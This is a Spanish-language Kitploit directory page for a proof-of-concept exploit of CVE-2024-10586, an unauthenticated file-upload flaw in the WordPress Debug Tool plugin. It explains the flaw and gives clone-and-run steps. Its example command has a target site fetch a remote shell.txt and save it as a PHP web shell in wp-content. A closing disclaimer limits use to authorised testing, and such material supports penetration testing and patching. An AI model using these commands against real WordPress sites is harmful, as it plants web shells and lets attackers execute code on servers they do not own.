Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-10586-Poc — Exploit de prueba de concepto para CVE-2024-10586 que apunta al plugin WordPress Debug Tool. Automatiza la carga arbitraria de archivos que conduce a la ejecución remota de código a través de solicitudes POST no autenticadas. | Kitploit
Herramientas/GitHubGitHub/nxploited/cve-2024-10586-poc
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubnxploited/cve-2024-10586-poc

CVE-2024-10586-Poc

Exploit de prueba de concepto para CVE-2024-10586 que apunta al plugin WordPress Debug Tool. Automatiza la carga arbitraria de archivos que conduce a la ejecución remota de código a través de solicitudes POST no autenticadas.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
hace 1 añoAún no revisado

Información de Vulnerabilidad

Descripción El plugin Debug Tool para WordPress es vulnerable a la creación arbitraria de archivos debido a una falta de comprobación de capacidades en la función dbt_pull_image() y a la ausencia de validación del tipo de archivo en todas las versiones hasta la 2.2 inclusive.
Esto permite que atacantes no autenticados creen archivos arbitrarios como archivos .php que pueden ser aprovechados para la ejecución remota de código.

CVE ID

CVE-2024-10586

Uso del Script

Requisitos Previos

  • Python 3.x instalado en tu sistema.
  • Instalar dependencias requeridas: pip install requests

Cómo Ejecutar

  1. Clona el repositorio desde GitHub:
root@kitploit:~
git clone https://github.com/Nxploited/CVE-2024-10586-Poc
cd CVE-2024-10586-Poc
  1. Ejecuta el script con el siguiente comando: python CVE-2024-10586.py -u -r -p

    Parámetros

  • -u, --url: La URL base del sitio WordPress (ej., http://example.com/wordpress).
  • -r, --remote: La URL del archivo remoto que se usará como fuente del payload.
  • -p, --path: Opcional. La ruta donde se guardará el shell. Por defecto es /opt/lampp/htdocs/wordpress/wp-content/Nxploit.php.

Ejemplo de Comando

root@kitploit:~
python CVE-2024-10586.py -u http://192.168.100.74/wordpress -r http://192.168.100.74/shell.txt -p /opt/lampp/htdocs/wordpress/wp-content/shell.php

Ejemplo de Uso

root@kitploit:~
python CVE-2024-10586.py -u http://192.168.100.74/wordpress -r http://192.168.100.74/shell.txt -p /opt/lampp/htdocs/wordpress/wp-content/shell.php

usage: CVE-2024-10586.py [-h] -u URL -r REMOTE [-p PATH]

Send a POST request to WordPress admin-ajax.php.

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     The base URL of the WordPress site.
  -r REMOTE, --remote REMOTE
                        The remote URL to use in the 'source' parameter.
  -p PATH, --path PATH  The file path to use in the 'missed' parameter. Defaults to '/opt/lampp/htdocs/wordpress/wp-content/Nxploit.php'.

Aviso de Responsabilidad

Este script es solo con fines educativos. Úsalo de manera responsable y solo en sistemas que poseas o para los que tengas permiso explícito de prueba. Los autores no se hacen responsables por el mal uso o daños causados por esta herramienta.

Descargar herramienta